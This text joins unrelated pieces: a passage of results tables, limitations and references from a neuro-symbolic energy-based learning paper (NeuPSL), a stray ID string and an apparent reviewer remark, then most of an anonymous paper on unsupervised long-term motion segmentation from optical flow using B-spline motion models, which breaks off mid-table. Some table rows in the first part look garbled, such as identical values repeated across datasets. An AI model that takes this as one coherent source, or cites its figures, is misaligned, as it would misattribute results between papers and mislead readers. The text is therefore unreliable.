0.65 ± 0.05| | Epinions | 12.54 ± 0.37| 1.33 ± 0.06| | Citeseer | 167 ± 37| 41.57 ± 6.39| | Cora | 18.4 ± 16| 19.65 ± 3.0| | DDI | 4.554 ± 13| 19.65 ± 3.0| | Yelp | 1.835 ± 47| 114 ± 4| | MNIST-Add1 | 1.624 ± 34| 232 ± 44| | MNIST-Add2 | TIME-OUT| 804 ± 106| ### Table 4: Prediction performance of HL-MRF models trained on value and minimizer-based losses. | Dataset | Energy | SP | MSE | BCE | |-------------|-------------|-------------|-------------|-------------| | CreateDebate| 64.76 ± 9.54| 64.68 ± 11.05| 65.33 ± 11.98| 64.83 ± 9.70| | 4Forums | 62.96 ± 11.1| 63.15 ± 4.40| 64.22 ± 6.41| 64.85 ± 6.01| | Epinions | 78.96 ± 2.29| 79.85 ± 1.62| 81.18 ± 2.21| 80.84 ± 2.32| | Citeseer | 70.29 ± 7.86| 70.29 ± 7.86| 71.09 ± 7.86| 71.09 ± 7.86| | Cora | 94.54 ± 1.74| 71.16 ± 2.32| 94.05 ± 1.41| 87.67 ± 1.31| | DDI | 94.54 ± 0.00| 94.61 ± 0.00| 94.70 ± 0.00| 95.08 ± 0.00| | Yelp | 18.11 ± 0.34| 18.57 ± 0.66| 18.14 ± 0.36| 17.93 ± 0.50| ants of NeuPSL models for the first 7 datasets, i.e., only symbolic weights are learned. Table 4 shows that across all 7 datasets, NeuPSL models trained with Algorithm 1 obtain a better average prediction performance than those trained using a valued-based loss. On the Cora dataset, the NeuPSL model fit with the BCE loss achieves over a 6% point improvement over SP, the higher-performing value-based loss. **Deep HL-MRF learning** Next, we evaluate the prediction performance of deep NeuPSL models. Here, we study the standard low-data setting for Citeseer and Cora. Specifically, results are averaged over 10 randomly sampled splits using 5% of the nodes for training, 5% of the nodes for validation, and 1,000 nodes for testing. We also report the prediction performance of the same strong baseline models used in Pryor et al. (2023) for this task: DeepStochLog (Winters et al., 2022), and a Graph Convolutional Network (GCN) (Kipf & Welling, 2017). Additionally, we investigate performance on MNIST-Addition, a widely used NeSy evaluation task first introduced by Manhaeve et al. (2018). In MNIST-Addition, models must determine the sum of two lists of MNIST images, for example, \( \sum_j + \sum_i = 8 \). The challenge stems from the lack of labels for the MNIST images; only the final sum of the equation is provided during training, 8 in this example. Implementation details for the neural and symbolic components of the NeuPSL models for both citation network and MNIST-Add experiments are provided in Appendix E.6. | | DeepStochlog | GCN | Energy | SP | NeuPSL | MSE | BCE | |------------------|--------------|-----|--------|----|--------|-----|-----| | **Citeseer** | | | | | | | | | | 62.68 ± 3.84 | 67.42 ± 0.66 | 69.63 ± 1.33 | 69.78 ± 1.42 | 69.62 ± 1.27 | 69.64 ± 1.33 | | **Cora** | | | | | | | | | | 71.28 ± 1.98 | 80.32 ± 1.11 | 80.41 ± 1.81 | 78.59 ± 4.93 | 81.48 ± 1.45 | 81.28 ± 1.45 | Table 5: Accuracy of DeepStochlog, GCN, and NeuPSL on Citeseer and Cora. | | CNN | LTN | DeepProbLog | Energy | NeuPSL | BCE | |------------------|-----|-----|-------------|--------|--------|-----| | **MNIST-Add1** | | | | | | | | 2,000 | 17.16 ± 0.62 | 69.25 ± 15.68 | 85.41 ± 01.28 | 87.96 ± 01.58 | 88.84 ± 02.07 | | 3,000 | 78.99 ± 01.11 | 92.90 ± 00.51 | 92.59 ± 01.40 | 95.69 ± 00.91 | 95.70 ± 02.84 | | **MNIST-Add2** | | | | | | | | 1,500 | 01.31 ± 00.25 | 02.02 ± 00.93 | 71.37 ± 03.99 | 90.20 ± 32.79 | 76.00 ± 2.61 | | 1,500 | 01.69 ± 00.27 | 71.79 ± 27.76 | 87.44 ± 02.15 | 90.56 ± 06.61 | 93.04 ± 2.26 | Table 6: Accuracy of CNN, LTN, DeepProbLog and NeuPSL on MNIST-Addition. Table 5 shows that fitting the neural network weights of a NeuPSL model with our NeSy-EBM learning framework is effective. NeuPSL models fit with the MSE and BCE losses consistently outperform both DeepStochlog and the GCN baseline. Moreover, Table 6 demonstrates NeuPSL models trained with Algorithm 1 and a BCE loss can achieve up to a 16% point performance improvement over those trained with a value-based loss. ## 7 LIMITATIONS Our learning framework is limited to NeSy-EBMs satisfying the two assumptions made in Section 4. While we advance the theory for NeuPSL to show it meets the assumptions, we do not know how to support NeSy-EBMs with non-differentiable value-functions. One approach is to substitute the inference program with a principled approximation. Lastly, although the idea to leverage inference algorithms such as BCD that effectively use warm-starts and improve learning runtimes is general, the inference algorithms were implemented for a NeSy system with an LCQP structure. ## 8 CONCLUSIONS AND FUTURE WORK We introduced a general learning framework for NeSy-EBMs and demonstrated its applicability with NeuPSL. Additionally, we proposed a novel NeuPSL inference formulation and algorithm with practical and theoretical advantages. A promising direction for future work is to extend the learning framework to support approximate inference solutions for estimating the objective gradient to further improve learning runtimes. In addition, the empirical results presented in this work motivate generalizing and applying our learning framework to additional NeSy systems and tasks. REFERENCES Kareem Ahmed, Stefano Teso, Kai-Wei Chang, Guy Van den Broeck, and Antonio Vergari. Semantic probabilistic layers for neuro-symbolic learning. In NeurIPS, 2022. Stephen Bach, Matthias Broecheler, Bert Huang, and Lise Getoor. Hinge-loss Markov random fields and probabilistic soft logic. Journal of Machine Learning Research (JMLR), 18(1):1–67, 2017. Sebastian Bader and Pascal Hitzler. Dimensions of neural-symbolic integration - A structured survey. arXiv, 2005. Samy Badreddine, Artur d’Avila Garcez, Luciano Serafini, and Michael Spranger. Logic tensor networks. AI, 303(4):103649, 2022. David Belanger, Bishan Yang, and Andrew McCallum. End-to-end learning for structure prediction energy networks. In ICML, 2017. Dimitri Bertsekas. Control of Uncertain Systems with a Set-Membership Description of Uncertainty. PhD thesis, MIT, 1971. Dimitri Bertsekas. Convex Optimization Theory. Athena Scientific, 2009. Dimitri Bertsekas and John N. Tsitsiklis. Parallel and Distributed Computation: Numerical Methods. Prentice Hall, 1989. Tarek R. Besold, Artur S. d’Avila Garcez, Sebastian Bader, Howard Bowman, Pedro M. Domingos, Pascal Hitzler, Kai-Uwe Kühnberger, Luís C. Lamb, Daniel Lowd, Priscila Machado Vieira Lima, Leo de Penning, Gadi Pinkas, Hoifung Poon, and Gerson Zaverucha. Neural-symbolic learning and reasoning: A survey and interpretation. arXiv, 2017. Joseph Bonnans and Alexander Shapiro. Optimization problems with perturbations: A guided tour. SIAM Review, 40(2):228–264, 1998. Joseph Bonnans and Alexander Shapiro. Perturbation Analysis of Optimization Problems. Springer, 2000. Stephen Boyd and Lieven Vandenberghe. Convex Optimization. Cambridge University Press, 2004. Stephen Boyd, Neal Parikh, Eric Chu, Borja Peleato, and Jonathan Eckstein. Distributed optimization and statistical learning via the alternating direction method of multipliers. Foundations and Trends in Machine Learning (FTML), 3(1):1–122, 2010. Jerome Bracken and James T. McGill. Mathematical programs with optimization problems in the constraints. Operations Research, 21(1):37–44, 1973. Michael Collins. Discriminative training methods for hidden Markov models: Theory and experiments with perceptron algorithms. In EMNLP, 2002. Benoît Colson, Patrice Marcotte, and Gilles Savard. An overview of bilevel optimization. Annals of Operations Research, 153(1):235–256, 2007. Thomas H. Cormen, Charles E. Leiserson, Ronald L. Rivest, and Clifford Stein. Introduction to Algorithms, Third Edition. The MIT Press, 3rd edition, 2009. Cristina Cornelio, Jan Stuehmer, Shell Xu Hu, and Timothy Hospedales. Learning where and when to reason in neuro-symbolic inference. In ICLR, 2023. John Danskin. The theory of max-min, with applications. SIAM Journal on Applied Mathematics, 14(4):641–664, 1966. Sridhar Dasarth, Sai Akhil Puranam, Karmvir Aingh Phogat, Sunil Reddy Tiyyagura, and Nigel Duffy. Deeppsl: End-to-end perception and reasoning. In IJCAI, 2023. Artur d’Avila Garcez, Marco Gori, Luís C. Lamb, Luciano Serafini, Michael Spranger, and Son N. Tran. Neural-symbolic computing: An effective methodology for principled integration of machine learning and reasoning. Journal of Applied Logics, 6(4):611–632, 2019.
xUe1YqEgd6
However, if I understand it right, the temporal consistency in equation (7) remains constrained to neighboring consecutive frames, similar to ST-MS. The primary distinction lies in using B-spline to model long-term motion changes and a different network architecture.
UNSUPERVISED MOTION SEGMENTATION IN ONE GO: SMOOTH LONG-TERM MODEL OVER A VIDEO Anonymous authors Paper under double-blind review ABSTRACT Human beings have the ability to continuously analyze a video and immediately extract the main motion components. Motion segmentation methods often proceed frame by frame. We want to go beyond this classical paradigm, and perform the motion segmentation over a video sequence in one go. It will be a prominent added value for downstream computer vision tasks, and could provide a pretext criterion for unsupervised video representation learning. In this perspective, we propose a novel long-term spatio-temporal model operating in a totally unsupervised way. It takes as input the volume of consecutive optical flow (OF) fields, and delivers a volume of segments of coherent motion over the video. More specifically, we have designed a transformer-based network, where we leverage a mathematically well-founded framework, the Evidence Lower Bound (ELBO), to infer the loss function. The loss function combines a flow reconstruction term involving spatio-temporal parametric motion models combining, in a novel way, polynomial (quadratic) motion models for the \((x, y)\)-spatial dimensions and B-splines for the time dimension of the video sequence, and a regularization term enforcing temporal consistency on the masks. We report experiments on four VOS benchmarks with convincing quantitative results. We also highlight through visual results the key contributions on temporal consistency brought by our method. 1 INTRODUCTION When dealing with videos, motion segmentation is one of the key issues. Human beings have the ability to continuously analyze a video and immediately extract the main motion components. Computer vision methods usually proceed frame by frame. We want to go beyond this classical paradigm and segment the different motion entities in a video sequence in one go. We thus thoroughly investigate the temporal dimension of the motion segmentation problem. Since the optical flow (OF) yields all the information on the movement between two images of the video sequence, it is natural to base motion segmentation on optical flow. Motion segmentation is a computer vision task in its own, but it is also useful for diverse downstream tasks as independent moving object detection, object tracking, or action recognition, to name a few. It is also leveraged in video object segmentation (VOS), while most often coupled with appearance. The optical flow field at time \(t\) enables to get the segmentation at frame \(t\) of the video. However, taking a large time window, and even the whole video sequence, is beneficial, since motion entities are generally consistent throughout a video sequence (or at least within every video shot for long videos). Indeed, temporal coherence is inherent to motion. Therefore, it is essential that motion segmentation takes advantage of it, especially in a long-term perspective. In this paper, we propose an original holistic method for multiple motion segmentation from optical flow over a video sequence. To the best of our knowledge, our optical flow segmentation (OFS) method is the first fully unsupervised network to involve long-term temporal consistency, and to segment multiple motions in a video sequence in one go. The main contributions of our work are as follows. Our network takes as input a volume of consecutive optical flows, and delivers consistent motion segmentation maps throughout the video sequence. It involves a transformer module allowing for long-term interactons. It is trained in a completely unsupervised manner, without any manual annotation or ground truth data of any kind. The loss function is inferred by leveraging the Evidence Lower Bound (ELBO) framework, and comprises a flow reconstruction term with original spatio-temporal parametric motion models and an additional term enforcing temporal consistency on the segmentation masks. We model with B-splines the long-term temporal evolution of the motion model parameters. Our method also involves a latent representation of the segment motion augmented with positional embedding. The rest of the paper is organized as follows. Section 2 describes related work regarding motion segmentation. Section 3 presents our unsupervised network for multiple motion segmentation in one go, embedding long-term temporal consistency. In Section 4 we provide implementation details. Section 5 reports results on four VOS benchmarks with a comparison to state-of-the-art unsupervised motion segmentation methods. Finally, Section 6 contains concluding remarks. 2 RELATED WORK Motion segmentation aims to break down each frame of a video sequence into components (or segments) of coherent motion. Usually, each motion segment is identified by a motion model, which can be hand-crafted such as affine or quadratic polynomial models or sometimes learned. Motion segmentation has been investigated for decades [19, 23, 38]. However, we will focus on recent methods in this section. Since accurate and efficient methods for estimating optical flow are now available, motion segmentation methods can leverage optical flow as a reliable input. The advent of deep learning methods in computer vision, and more recently the use of transformer-based networks with attention mechanisms [11], has also encompassed motion segmentation. In [35], a transformer module, more specifically, the slot attention mechanism introduced in [18], is leveraged to perform motion segmentation from the optical flow. As a matter of fact, it addresses a binary segmentation problem, foreground moving object vs background. The loss function is composed of two terms, a flow reconstruction term and an entropy term to make masks as binary as possible. Another approach is adopted in [34] that is able to cope with multiple motion segmentation. Nonlinear subspace filters are learned from stacked deep multi-layer perceptrons. Then, motion segmentation is inferred at inference by applying K-means to the output embeddings. In [21], the Expectation-Maximization (EM) framework is leveraged to define the loss function and the training procedure for an unsupervised frame-by-frame motion segmentation, where 12-parameter quadratic motion models are involved. The same authors also proposed an extension of that method in [22] to better handle the temporal dimension of the problem, by considering triplets of flows as input. In [36], the authors developed an adversarial method whose aim is to generate a mask hiding the input optical flow, where an inpainter network attempts to recover the flow within the mask. The rationale is that no correct reconstruction of the inside flow can be achieved from the outside flow, if the hidden area exhibits an independent motion and then constitutes a motion segment. The temporal dimension of motion segmentation has been considered in various ways [30]. Regarding deep learning approaches, motion segmentation at time t is improved at training time in [35], by taking, as input, flows between t and several time instants before and after t. The authors of [8] consider several consecutive RGB frames as input of their self-supervised method. Optical flow is only computed at training time, and the loss function also comprises a temporal consistency term. However, the latter is not applied to two consecutive segmentation masks, but for pairings between the same frame t and another (more or less distant) one. In [9], spatio-temporal transformers were designed for video object segmentation involving temporal feature propagation. VOS usually requires motion segmentation, often coupled with appearance [5, 10, 37]. It was addressed with supervised or semi-supervised methods as in [7, 9, 12], but also with unsupervised methods [36, 35, 21]. VOS is concerned with the segmentation of primary objects, i.e., object moving in the foreground of a scene and possibly tracked by the camera [39]. Thus, VOS generally involves binary ground truth segregating primary moving object against background. This is for instance the case for the DAVIS2016 benchmark [26]. Recent works have revisited the way of coupling appearance and motion for VOS. The AMD method [17] includes two pathways, the appearance one and the motion one. If it does not use optical flow as input and brings out the objectness concept, it nevertheless relies on a coarse motion representation. The RCF method [16] involves learnable motion models, and is structured in two stages, a motion-supervised object discovery stage, and then, a refinement stage with residual motion prediction and high-level appearance supervision. However, the method cannot distinguish objects undergoing different motions. In [6], the prediction of probable motion patterns is used at the training stage as a cue to learn objectness from videos. Divided attention is promoted in (14). The resulting DivA method is based on the same principle as in (36) that motion segments are mutually uninformative. However, it is not limited to binary segmentation. It can segment a variable number of moving objects from optical flow, by leveraging a slot attention mechanism guided by the image content through a cross-modal conditional slot decoder. Our fully unsupervised approach differs from these previous works in several respects. We rely only on optical flow and take a volume of OF fields as input, providing a volume of consistent segmentation maps. We introduce B-splines to define parametric motion models able to correctly handle motion evolution over time, and we express long-term temporal consistency. We infer the loss function from the Evidence Lower Bound (ELBO) framework. In (22), the authors also deal with temporal consistency. However, they only took a triplet of optical flow fields as input, they did not resort to transformers, and the temporal part of the motion model was just a linear (first-order polynomial) model in time. In addition, their temporal linkage of the consecutive motion segmentations over a video sequence was an ad hoc post-processing. In contrast, we define a fully integrated long-term model that is end-to-end trained in an unsupervisedly way. We will call our method LT-MS method, for long-term motion segmentation, and in contrast, we will refer to the method (22) as the ST-MS method, for short-term motion segmentation. 3 Long-term Motion Segmentation Method We have designed a transformer-based network for multiple motion segmentation from optical flow. It is inspired from the MaskFormer architecture (4), but it only comprises one head corresponding to the mask prediction, as described in Fig.1. The network takes as input a volume, of flexible temporal length, comprising several consecutive optical flow fields. Temporal consistency is expressed in two main ways at the training stage. Firstly, we associate a space-time motion model with each segment to characterize its motion along with the evolution of the latter over time. Secondly, the loss function comprises an additional term enforcing consistent labeling of the motion segments over the volume. ![Figure 1](image) Figure 1: Overall architecture of our multiple motion segmentation method ensuring temporal consistency with the loss term $L_c$ and the B-spline space-time motion models $\theta_k$ (for $k = 1, \ldots, K$). It takes as input a volume of $T$ flow fields. It comprises a 3D U-net ($e$ and $d$ boxes) and a transformer decoder ($t$ box). It also involves positional encoding. A cross-attention product yields the $K$ segmentation masks corresponding to the input volume For the sake of clarity, the block diagram is represented for three motion segments ($K = 3$). $L_r$ is the flow-reconstruction loss term. 3.1 Spatio-temporal Parametric Motion Model The set of $T$ consecutive flows will be designated as a space-time volume (or volume, to make it short). The volume could even be the whole video sequence. Our space-time motion model is estimated through B-spline functions (32). We assign a spatio-temporal parametric motion model $\hat{f}_{\theta_k}$ to each motion segment $k$, $k = 1, \ldots, K$. $\theta_k$ specifies the motion model $f$ for segment $k$. The motion model involves $J$ parameters and each parameter $\theta_{kj}$, $j = 1, \ldots, J$, of the model results from a B-spline function of order $n$ in the variable $t$ over the space-time volume. In practice, we take $n = 3$. The number $L$ of control points is given by $L = 2 + \lfloor \frac{T-2}{\nu} \rfloor$, where $\nu$ allows us to set the temporal frequency of control points. We put a control point at both ends of the volume (at $t = 1$ and $t = T$), and the other control points are equidistantly placed between the two. Most often, the control points are not located at time points of the video sequence. The space-time spline-based motion model is illustrated in Fig. 2. Just for this illustration, the motion models are computed within the two segments, foreground moving object and background, provided by the ground truth. The estimated motion model for the foreground moving object is able to capture the periodic nature of the swing motion as demonstrated by the plots of the computed motion model parameters. Also, the motion model computed in the background segment perfectly fits the camera motion. Articulated motion (woman’s legs) would require multiple-motion segmentation. ![Figure 2](image) **Figure 2:** Illustration of the spatiotemporal spline-based motion model. Top row: input flows displayed with the HSV code for the *swing* video of DAVIS2016 dataset, binary segmentation ground truth, flows generated by the estimated spline-based motion models for the two segments. Bottom row: plot of the temporal evolution of the six estimated model parameters corresponding to the flow $u$-coordinate for the foreground moving object. Any parametric motion model could be considered. We use the 12-parameter quadratic motion model to be able to account for continuously varying depth surface of the objects in the scene, especially for the whole background, and for complex object or camera motions. In contrast, the affine and the 8-parameter quadratic motion models assume a planar object surface. Indeed, the latter exactly corresponds to the projection in the image of the 3D rigid motion of a planar surface. It is equivalent for velocity fields to the homography transform. However, in presence of severe depth effects (strong depth discontinuities) and camera motion, the static scene cannot be represented by a single motion model due to motion parallax produced by static objects located in the foreground. Regarding first the spatial dimension of the motion model, the 2D flow vector yielded by the full quadratic motion model at point $(x, y)$ writes: $$\tilde{f}_\theta(x, y) = (\theta_1 + \theta_2 x + \theta_3 y + \theta_7 x^2 + \theta_8 xy + \theta_9 y^2, \theta_4 + \theta_5 x + \theta_6 y + \theta_{10} x^2 + \theta_{11} xy + \theta_{12} y^2)^T.$$ (1) To correctly handle complex temporal evolution, we resort to the spline approximation as aforementioned. By denoting now $S_n(\theta_k)$ the subscript of $\tilde{f}$, we emphasize that the motion model parameters for each segment $k$ are estimated through the B-spline functions. More specifically, we have: $$\tilde{f}_{S_n(\theta_k)}(i, t) = \sum_{l=1}^{L} \tilde{f}_{\theta_{k,l}}(i, t) B_{n,l}(t),$$ (2) where $B_{n,l}$ is the $l^{th}$ B-spline and $\theta_{k,l}$ corresponds to the $l^{th}$ control point of the spline function. ### 3.2 Loss Function We consider a volume of optical flow fields $f \in \mathbb{R}^{2 \times T \times W \times H}$, the spatial grid $\Omega \in \mathbb{R}^{W \times H}$ and $T$ temporal steps. We denote $f(i, t) \in \mathbb{R}^2$ the flow associated to site $i \in \Omega$ at time $t$. We assume that we can decompose the flow as a set of $K$ segments, each one exhibiting a coherent motion. Flow vectors within a given segment $k$ are represented by a smooth parametric motion model parametrized by $\vartheta_k$. Variable $z_{i,t}$ conveys the motion segmentation, $z_{i,t}^k = 1$ if site $(i, t)$ belongs to segment $k$. $z$ and $\vartheta = \{\vartheta_k, k = 1 \cdots K\}$ are latent variables, and $f$ is the observed data. Following (13), we introduce an approximate distribution over segmentation and motion model parameters: $$q(z, \vartheta | f) = q(z | f) q(\vartheta) = \left( \prod_{t=1}^{T} \prod_{i \in \Omega} \prod_{k=1}^{K} q(z_{i,t}^k | f) \right) \left( \prod_{k} q(\vartheta_k) \right),$$ (3) where \( q(\vartheta_k) \triangleq \delta(\theta_k) \) with \( \delta \) the dirac distribution and \( q(z_{i,t}^k|f) = g_\phi(f)_{i,t}^k \cdot g_\phi \) is our network model taking as input the optical flow volume and returning a probabilistic segmentation volume. We can also write the data-likelihood over a dataset \( D \) of optical flow volumes \( f \) as: \[ \log(D) = \sum_{f \in D} \log p(f) = \sum_{f \in D} (\mathbb{E}_{q(z,\vartheta|f)}[\log \frac{p(f,z,\vartheta)}{q(z,\vartheta|f)}] + KL(q(z,\vartheta|f)||p(z,\vartheta|f))) \geq \sum_{f \in D} (\mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] - KL(q(z,\vartheta|f)||p(z,\vartheta))), \] (4) where we obtain the Evidence Lower Bound (ELBO). Following the assumption stated above, we can write our likelihood as: \[ p(f|z,\vartheta) = \prod_{t=1}^{T} \prod_{k=1}^{K} p(f(t)|\vartheta_k,z) \propto \prod_{t=1}^{T} \prod_{k=1}^{K} \prod_{i \in \Omega} \exp(-||f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)||_1/\xi_{f,t}) z_{i,t}^k, \] (5) where \( \tilde{f}_{S_n(\vartheta_k)}(i,t) \) is the flow vector given by the parametric motion model of parameters \( \vartheta_k \) at point \((i,t)\) as defined in Section [3.1] through the spline approximation and \( \xi_{f,t} = \sum_i ||f(i,t)||_1 \) is a normalizing factor. From this likelihood, we can write the left term of the ELBO as: \[ L_r = \mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] = \sum_{t=1}^{T} \sum_{k} \mathbb{E}_q[\log p(f(t)|\vartheta_k,z)] = -\sum_{t=1}^{T} \sum_{i \in \Omega} \sum_{k} g_\phi(f)_{i,t}^k ||f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)||_1/\xi_{f,t} \] (6) The term \( KL(q(z,\vartheta|f)||p(z,\vartheta)) \) allows us to define a prior over the segmentation. We want to enforce the property that the segmentation labels are temporally consistent, i.e., similar between neighbouring frames. We approximate this term using the temporal consistency loss defined in (22), as it showed good experimental results and was efficient to compute at training time: \[ L_c = \frac{1}{2K|I|} \sum_{i \in \Omega} \sum_{t=2}^{T} \mathbb{1}[||f_{i,t} - f_{i,t-1}||_1 < \lambda] \sum_{k=1}^{K} |g_\phi(f)_{i,t}^k - g_\phi(f)_{i,t-1}^k|, \] (7) The threshold \( \lambda \) allows us to discard occlusion areas. The loss function is thus defined by: \[ \sum_{f \in D} L(f,\phi,\theta) = \sum_{f \in D} L_r(f,\phi,\theta) + \beta L_c(f,\phi). \] (8) We set \( \beta = 1 \). The training procedure alternatively updates \( \theta \) and \( \phi \) with \( \alpha \) as learning rate: \[ \text{for } f \in D : \quad \theta^* = \arg \min_\theta L(f,\phi,\theta)(f); \quad \phi_{t+1} = \phi_t - \alpha \nabla_\phi L(f,\phi,\theta^*) \] (9) ### 3.3 Network Architecture The overall architecture of our unsupervised multiple motion segmentation framework is illustrated in Fig. It includes two main modules. The first one, taking the flow volume as input, is a 3D U-net (29). The latent code augmented with embedding positions is directed to the transformer decoder. Then, by cross-attention, the output formed by the volume of segmentation masks is produced. The training of the overall architecture is based on the minimization of the loss function defined below, while the motion model parameters of the segments are given by the B-spline estimation. Temporal consistency is provided by the loss function and the space-time motion models. ### 4 Implementation #### 4.1 Implementation Details Following (6, 16, 21, 22, 35), we adopt the RAFT method (31) to compute the optical flow fields. More specifically, we use the RAFT version trained on the MPI Sintel dataset (2). We downsample the computed flow fields to feed the network with $128 \times 224$ vector fields. The output segmentation maps are upsampled to the initial frame size for evaluation. Thus, we can perform efficient training and inference stages. We typically take flow volumes of temporal length $T = 9$ at training time. However, at test time, we can process flow volumes of larger temporal length, and even the flow volume of the whole sequence. To compute of the spatio-temporal parametric motion models, $x$ and $y$ coordinates are normalized within $[-1, 1]$, and a similar normalization is applied to the $t$ coordinate. The full 12-parameter quadratic motion model is chosen in all the experiments, and we take $\nu = 3$ for the frequency factor in the B-spline approximation. We select for each site $i$ the segment $\hat{k}$ with the highest prediction. In eq.(7), we set $\lambda$ as the 99th quantile of the flow differences over the flow volume. Our LT-MS method is very efficient at test time. The computational time amounts on average to 210 fps on a GPU P100, that is, twice as fast as the ST-MS method (22). It is certainly due to the long flow sequence given as input to the network, which allows for parallelisation of some heavy computations. In addition, our LT-MS architecture remains lightweight, since it combines only three Unet layers and a transformer decoder on the downsampled feature space. Let us also stress that our LT-MS method does not involve any post-processing at all. ### 4.2 Data Augmentation and Network Training We applied two types of data augmentation dedicated to optical flow. First, we add a global flow to the input flow similarly as in the EM (21) and ST-MS (22) methods. However, in our case, the global flow is given by a full spline-based spatio-temporal motion model whose parameters are chosen at random. The same global flow is added to the flow fields of a given input volume. It allows us to mimic diverse camera motions, enforcing that the motion segments are independent of it. In addition, we corrupt a few flows out of the nine input ones. Thus, we simulate poorly estimated flow fields at some time instants, and the temporal consistency should overcome it. Our motion segmentation method is fully unsupervised. We never use any manual annotation. We train our model only with the FlyingThings3D (FT3D) dataset (20), whatever the dataset considered at test time. This ensures that our LT-MS network generalizes well to unseen datasets. Regarding hyperparameter setting, we select the stopping epoch from the loss function evaluated on the DAVIS2016 training set. Additional information on the optimization stage is given in the Appendix. ## 5 Experimental Results We have carried out comparative experiments on four datasets: DAVIS2016[^1], SegTrackV2[^2], FBMS59 (24), and DAVIS2017-motion (33). More information on the datasets is provided in the Appendix. ### 5.1 Ablation Study We have conducted an ablation study to assess three main components of our method LT-MS with four masks ($K = 4$), in particular related to the temporal dimension of the problem. We have changed one component at a time as specified hereafter. We use the polynomial space-time quadratic motion model of ST-MS (22) instead of the space-time motion model based on B-splines over the input sequence. We omit the consistency term $L_c$ in the loss function. We just take the convnet without the transformer decoder. All the ablation experiments were run on the three datasets, DAVIS2016, FBMS59, SegTrackV2. Results are collected in Table 1. In addition, we performed them for two input sequence configurations, respectively input sequences of ten flows, and input sequence of 120 flows (in practice, the whole video for the DAVIS2016 dataset). We can observe that the three ablations have almost the same impact on the performance. The three corresponding model components, i.e., the spline-based motion model, the temporal-consistency loss term, and the transformer decoder are thus all beneficial in similar proportions. They are able to handle the temporal dimension of the problem and the temporal motion evolution along the sequence in a compelling way. Admittedly, the contributions of these three components are more significant for the FBMS59 and the SegTrackV2. [^1]: https://davischallenge.org/index.html [^2]: https://paperswithcode.com/dataset/segtrack-v2-1 Table 1: Ablation study for three main components of our method LT-MS ($K = 4$) on DAVIS2016, FBMS59 and SegTrackV2. Only one model component is modified at a time. The performance scores are given by the Jaccard index $J$. We report ablation results with two input-flow sequence length (or cut size), respectively, by dividing the video into pieces of ten successive frames or by considering 120 successive frames (in practice, the whole video for DAVIS2016). | Ablation / Dataset | DAVIS2016 | FBMS59 | SegTrackv2 | |-----------------------------|-----------|--------|------------| | Cut Size | 10 | 120 | 10 | 120 | 10 | 120 | | Full Model LT-MS-K4 | 74.8 | 72.4 | 61.0 | 58.2 | 61.3 | 60.4 | | Unet3D only | 73.0 | 71.3 | 56.6 | 55.5 | 58.2 | 57.3 | | No consistency term $L_c$ | 73.5 | 71.0 | 57.5 | 55.5 | 58.0 | 57.5 | | Polynomial space-time quadratic model | 73.4 | 69.8 | 57.4 | 54.5 | 57.8 | 56.6 | Datasets. However, the dynamic content of the majority of the DAVIS2016 videos, and then, the overall performance score, cannot allow us to fully appreciate the contributions of these three model components. Yet, they can be acknowledged by visualizing results obtained on some videos of DAVIS2016, as shown in the Appendix. 5.2 Quantitative and Comparative Evaluation We report in Table 2 the results obtained by two versions of our LT-MS method on the three datasets DAVIS2016, SegTrackV2, and FBMS59. LT-MS-K2 performs segmentation with only two masks ($K = 2$) while LT-MS-K4 involves four masks ($K = 4$). Table 2 collects results obtained by our LT-MS method and other existing unsupervised methods, when available. We follow the categorization proposed in (21) regarding input and training. However, we have added a category w.r.t. the network input for four recent methods, (6, 8, 16, 17), that only use RGB images as input at test time, the optical flow being only involved in the loss function. Evaluation is performed on the binary ground truth (foreground moving object vs background) for the three datasets. In the Appendix, we explain how we select the segments for the binary evaluation from the multiple motion segments delivered by our LT-MS method. We still put the OCLR method (33) in the category of unsupervised methods, whereas the authors of the DivA method (14) did not. Indeed, OCLR is not fully unsupervised, since it relies on human-annotated sprites to include realistic shapes in the computer-generated data used at training time. We consider the OCLR version taking only optical flow as input. The post-processing added to the CIS method (36), based on Conditional Random Fields (CRF), is an heavy one, which leads most authors to retain only the version without post-processing for a fair comparison. As shown in Table 2, our LT-MS method provides very convincing results, both for LT-MS-K2 and LT-MS-K4, in the category of unsupervised methods based on optical flow only. OCLR and DivA demonstrate better performance on the SegTrackV2 dataset. However, as aforementioned, OCLR is not a fully unsupervised method, while DivA leverages RGB images in its conditional decoder. In addition, DivA, along with MoSeg and CIS methods, takes multi-step flows as input between $t$ and in turn $t+1$, $t+2$, $t-1$, $t-2$, and averages the four corresponding predictions to get the final result. SegTrackV2 includes sequences acquired with a poorly controlled handheld camera, which leads to unstable sequences where the contribution of our method is therefore less likely to be emphasized. Overall, temporal consistency is properly handled over long temporal periods by our LT-MS method. Beyond segmentation performance, we want to stress that our method is the only one providing by design a coherent segmentation over the sequence, which is a significant added value. Thus, we can claim that we have not only segmented the moving objects throughout the sequence, but also achieved some kind of tracking. 5.3 Multi-segment Evaluation We have also performed the evaluation of multiple motion segmentation for a multi-segment setting. Since multiple-motion segmentation is harder than the binary motion segmentation (moving foreground vs background), accuracy scores are expected to decrease for all methods. In Table 3, we report comparative results on the DAVIS2017-motion dataset and on FBMS59. As for the other methods, we performed segmentation with three masks. To this end, we finetuned the LT-MS-K4 Table 2: Results obtained with two versions of our LT-MS method on DAVIS2016, SegTrackV2, FBMS59. LT-MS-K2 performs segmentation with two masks ($K = 2$), and LT-MS-K4 involves four masks ($K = 4$). We include comparison with unsupervised methods (scores from cited articles). All scores correspond to evaluation on the binary ground-truth. For LT-MS-K4 and LT-MS-K2, we report results obtained with a cut size of 10. Results with a cut size of 120 are given for LT-MS-K4 in Table 1 with very close performance (additional results on this point in the Appendix). The Jaccard index $J$ is the intersection over union between the extracted segments and the ground truth, while $F$ focuses on segment boundary accuracy. Performance is assessed by the average score over all samples, for all datasets but DAVIS2016. For the latter, the overall score is given by the average of sequence scores. *Actually, putting OCLR as an unsupervised method can be questionable (see main text). †DivA somehow uses RGB input since its conditional decoder leverages input images. | Method | Training | Input | DAVIS2016 | SegTrack V2 | FBMS59 | |-----------------|--------------|-------------|-----------|-------------|--------| | **Ours LT-MS-K4** | Unsupervised | Flow | 74.8 | 72.2 | 61.3 | | **Ours LT-MS-K2** | | | 70.3 | 68.5 | 58.6 | | ST-MS (4 masks) | | | 73.2 | 70.3 | 55.0 | | EM (21) | | | 69.3 